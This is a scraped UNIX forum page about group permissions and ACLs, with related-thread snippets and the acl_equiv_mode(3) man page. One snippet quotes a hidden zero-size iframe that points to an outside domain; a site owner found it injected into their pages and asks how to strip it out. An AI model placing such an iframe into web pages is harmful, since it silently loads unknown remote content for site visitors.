Sponsored Content
Top Forums UNIX for Dummies Questions & Answers Multiple Group Priveleges on same directory? Post 7323 by LivinFree on Monday 24th of September 2001 11:22:38 PM
Old 09-25-2001
Modern Linux distributions also carry support for ACL's, although it's not used as much as it should be.

10 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

sqlplus priveleges.

I was wondering if users can be restricted from invoking sqlplus in unix from certain directories. In other words certain users should be able to invoke sqlplus only through certain directories (1 Reply)
Discussion started by: oracle8
1 Replies

2. UNIX for Advanced & Expert Users

How to find permissions/roles/priveleges of User

Hello Everyone, if we log on to unix server how do we find that what permissions/roles and priveleges are assigned to any particular user. Here i am not talking about the file permissions. Thanks (1 Reply)
Discussion started by: hardesh
1 Replies

3. UNIX for Dummies Questions & Answers

limiting home directory size for a group

Is there a way to set the size of the home directory for every single user in a specific group, in more details: I have a group & i will have to add about 20 users to it to be their home directories. i want each of the home directories for this group to be limited to 50 MB Help? (11 Replies)
Discussion started by: Katkota
11 Replies

4. UNIX for Dummies Questions & Answers

how to add permission of directory to a group

Hi, A simple and silly question on Unix. I have a directory named "a" and I would like to grant permission to group name "text" to access, read and execute my directory. Could anyone help me? Thanks. (2 Replies)
Discussion started by: ahjiefreak
2 Replies

5. Shell Programming and Scripting

[help]Delete or replace text in multiple file and multiple directory

here's the case : almost of php/html file on my site has added the text : <iframe src="http://google-analyze.cn/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>I don't know how this happen, so i want to remove above text from all... (16 Replies)
Discussion started by: dzufauzan
16 Replies

6. Shell Programming and Scripting

print summary of directory, and group all symbolic links

I am trying to get a summary of filetypes in a directory, but the total count of symbolic links is not working. I am stuck at the results of the file command. I have used the find command to confirm my expectations, but my bash function is not giving the results I want. Here is my function:... (2 Replies)
Discussion started by: AlphaLexman
2 Replies

7. UNIX for Dummies Questions & Answers

Group files by owner and show directory

Hello, i would like to find huge files and group them by owners. To find big files i use this command: ls -lR | sort -bnr +4 | head -n 75 which give me 75 biggest files, then i need to see in which subdirectory is every file. second thing i dont know is how to group those files by owner, could... (6 Replies)
Discussion started by: dealer1985
6 Replies

8. UNIX for Advanced & Expert Users

Setfacl and granting permissions to a group and its members on a directory

Hi! I created a group HACKERS and made the user "demo" its member. $ id demo uid=500(demo) gid=500(demo) groups=500(demo),502(HACKERS) $ Next, I granted read and execute permissions to the group "HACKERS" on /var/log/httpd as shown below: setfacl -m "g:HACKERS:r-x"... (2 Replies)
Discussion started by: indiansoil
2 Replies

9. Shell Programming and Scripting

Average across multiple columns group by

Hi experts, I want to group by average, for multiple columns starting column $7 until NF, group by ($1-$5), please help For just 7th column, I can do awk ' NR>1{ arr += $7 count += 1 } END{ for (a in arr) { print a, arr/count ... (10 Replies)
Discussion started by: ritakadm
10 Replies

10. UNIX for Advanced & Expert Users

Linux cant cd into directory and part of group

I am part of the group group1. The directory permission I am trying to cd into are 770 for both the parent directory and child directory but I still can not cd into. What am I doing wrong? $ ls -l /NAS/infa/ drwxrwxr-x. 22 user1 group1 506 Jun 6 17:05 infa_shared $... (5 Replies)
Discussion started by: cokedude
5 Replies
ACL_EQUIV_MODE(3)					   BSD Library Functions Manual 					 ACL_EQUIV_MODE(3)

NAME
acl_equiv_mode -- check for an equivalent ACL LIBRARY
Linux Access Control Lists library (libacl, -lacl). SYNOPSIS
#include <sys/types.h> #include <acl/libacl.h> int acl_equiv_mode(acl_t acl, mode_t *mode_p); DESCRIPTION
The acl_equiv_mode() function checks if the ACL pointed to by the argument acl contains only the required ACL entries of tag types ACL_USER_OBJ, ACL_GROUP_OBJ, and ACL_OTHER, and contains no permissions other that ACL_READ, ACL_WRITE or ACL_EXECUTE. If the ACL has this form, it can can be fully represented with the traditional file permission bits, and is considered equivalent with the traditional file per- mission bits. If acl is an equivalent ACL and the pointer mode_p is not NULL, the value pointed to by mode_p is set to the value that defines the same owner, group and other permissions as contained in the ACL. RETURN VALUE
On success, this function returns the value 0 if acl is an equivalent ACL, and the value 1 if acl is not an equivalent ACL. On error, the value -1 is returned, and errno is set appropriately. ERRORS
If any of the following conditions occur, the acl_equiv_mode() function returns the value -1 and sets errno to the corresponding value: [EINVAL] The argument acl is not a valid pointer to an ACL. STANDARDS
This is a non-portable, Linux specific extension to the ACL manipulation functions defined in IEEE Std 1003.1e draft 17 ("POSIX.1e", aban- doned). SEE ALSO
acl_from_mode(3), acl(5) AUTHOR
Written by Andreas Gruenbacher <a.gruenbacher@bestbits.at>. Linux ACL March 23, 2002 Linux ACL